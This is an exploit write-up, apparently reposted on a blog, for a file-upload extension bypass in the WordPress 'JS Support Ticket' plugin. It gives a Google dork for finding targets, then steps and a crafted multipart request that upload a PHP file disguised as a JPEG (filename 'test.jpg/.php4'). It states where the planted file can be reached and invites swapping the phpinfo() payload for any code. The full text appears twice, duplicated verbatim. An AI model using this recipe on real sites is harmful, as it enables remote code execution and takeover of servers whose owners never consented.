# Exploit Title: [Wordpress "Js Support Ticket" File Upload Bypass Extensions]
# Google Dork: [inurl:/js-support-ticket-controlpanel/]
# Date: [3-12-2015]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://joomsky.com/products/js-supprot-ticket-wp.html]
# Version: [1.X.X]
# Contact: [https://ask.fm/m1g1m]
---------------
1- Description |
---------------
When you open ticket you can upload Attachments only File Extension Type (doc,docx,odt,pdf,txt,png,jpeg,jpg)
but you can bypass it and upload another extensions .
--------------------------------------
2- |Proof of Concept|
--------------------------------------
Use Notepad++ open new file ,
Add
[ GIF89a;
<?php phpinfo(); ?> #you can replace this code to your code
]
" save file as test.jpg "
Open ticket page and Complete the required fields , and upload your [test.jpg]
Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;"
example :
-----------------------------319722301512393rn
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"rn
Content-Type: image/jpegrn
rn
rn
<?php phpinfo(); ?>rn
-----------------------------319722301512393rn
#File will be visible:
http://wordpress_site/wp-content/plugins/js-support-ticket/jssupportticketdata/attachmentdata/ticket/ticket_yourid/yourfile.php
#also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .
# Google Dork: [inurl:/js-support-ticket-controlpanel/]
# Date: [3-12-2015]
# Exploit Author: [Mgm-Eg]
# Vendor Homepage: [http://joomsky.com/products/js-supprot-ticket-wp.html]
# Version: [1.X.X]
# Contact: [https://ask.fm/m1g1m]
---------------
1- Description |
---------------
When you open ticket you can upload Attachments only File Extension Type (doc,docx,odt,pdf,txt,png,jpeg,jpg)
but you can bypass it and upload another extensions .
--------------------------------------
2- |Proof of Concept|
--------------------------------------
Use Notepad++ open new file ,
Add
[ GIF89a;
<?php phpinfo(); ?> #you can replace this code to your code
]
" save file as test.jpg "
Open ticket page and Complete the required fields , and upload your [test.jpg]
Use Http Live Header , Open the request and edit file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;"
example :
-----------------------------319722301512393rn
Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"rn
Content-Type: image/jpegrn
rn
rn
<?php phpinfo(); ?>rn
-----------------------------319722301512393rn
#File will be visible:
http://wordpress_site/wp-content/plugins/js-support-ticket/jssupportticketdata/attachmentdata/ticket/ticket_yourid/yourfile.php
#also check your email to know your path file , or open my tickets to see all tickets you have sent to know your path file .
0 nhận xét:
Post a Comment